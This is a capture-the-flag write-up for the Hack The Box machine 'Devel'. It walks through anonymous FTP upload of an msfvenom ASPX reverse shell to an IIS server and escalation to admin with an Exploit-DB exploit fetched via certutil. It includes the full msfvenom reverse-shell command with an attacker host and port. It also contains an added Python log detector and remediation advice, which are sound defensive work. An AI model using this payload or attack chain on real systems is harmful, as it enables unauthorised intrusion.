HTB : Devel


Network Enumeration

To begin, let’s run an nmap scan to identify open ports.


WEB Enumeration

Use gobuster to search for directories.

Directory enumeration doesn’t turn up anything interesting.

Port 80

It seems to be running an IIS 7 server.


FTP Enumeration

From the nmap scan, we notice that we can access the FTP server anonymously.

The FTP server holds files and directories connecting to the test. Let’s try uploading a reverse shell to see if we can connect to it.


Initial SHELL

Use msfvenom to create a payload and upload it to the web server.

  msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1234 -f aspx > reverse.aspx

Run the file and we get a shell.
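
From the defender's side, the anonymous FTP upload followed by an HTTP request for the same file leaves a clear trail in the server logs. The following is an added example, not part of the original write-up: it correlates W3C-style FTP and HTTP logs to flag script files stored by an anonymous FTP user and then served over HTTP. The log lines are constructed, the column layout is read from each `#Fields:` header, and it assumes the FTP root is the web root so both logs use the same path.

```python
import posixpath

# Assumed list of extensions IIS executes server-side; adjust to the site's handler mappings.
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx"}
ANON_USERS = {"anonymous", "ftp"}  # assumed spellings of the anonymous login

# Constructed sample logs (not from the original post); columns follow each #Fields header.
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.10 anonymous STOR notes.txt 226
2024-01-01 10:00:05 192.0.2.10 anonymous STOR reverse.aspx 226
2024-01-01 10:01:00 192.0.2.20 webadmin STOR default.aspx 226
"""
HTTP_LOG = """#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-01 09:59:00 GET /welcome.png 192.0.2.10 200
2024-01-01 10:00:09 GET /reverse.aspx 192.0.2.10 200
2024-01-01 10:02:00 GET /default.aspx 192.0.2.30 200
"""

def parse_w3c(text):
    """Yield one dict per log entry, named by the log's own #Fields: header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def find_upload_then_execute(ftp_log, http_log):
    """Return (path, uploader_ip, requester_ip, upload_time, request_time) for each
    script file stored over anonymous FTP and later served with HTTP 200."""
    uploads = {}
    for e in parse_w3c(ftp_log):
        path = "/" + e["cs-uri-stem"].lstrip("/").lower()
        if (e["cs-method"].upper() == "STOR" and e["sc-status"] == "226"
                and e["cs-username"].lower() in ANON_USERS
                and posixpath.splitext(path)[1] in SCRIPT_EXTS):
            uploads[path] = (e["c-ip"], e["date"] + " " + e["time"])
    hits = []
    for e in parse_w3c(http_log):
        path, ts = e["cs-uri-stem"].lower(), e["date"] + " " + e["time"]
        if path in uploads and e["sc-status"] == "200" and ts >= uploads[path][1]:
            ip, up_ts = uploads[path]
            hits.append((path, ip, e["c-ip"], up_ts, ts))
    return hits

if __name__ == "__main__":
    print(find_upload_then_execute(FTP_LOG, HTTP_LOG))
```

The underlying fix is to disable anonymous write access on the FTP site, or to move the FTP root out of any directory the web server executes scripts from.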

System Enumeration

After some enumeration, I noticed the machine was outdated and had no patches.

We could easily use Metasploit to find an exploit, but I decided to search for the vulnerable OS exploit online.


Privilege Escalation

Searching online, I came across an exploit from Exploit-DB that matches our criteria.

It comes with the compiling instructions.

I downloaded the exploit via searchsploit and compiled it.

I started a Python web server and downloaded the exploit via certutil.

Run the exploit and we get admin.

We can find the user and root flags on the users’ desktops.
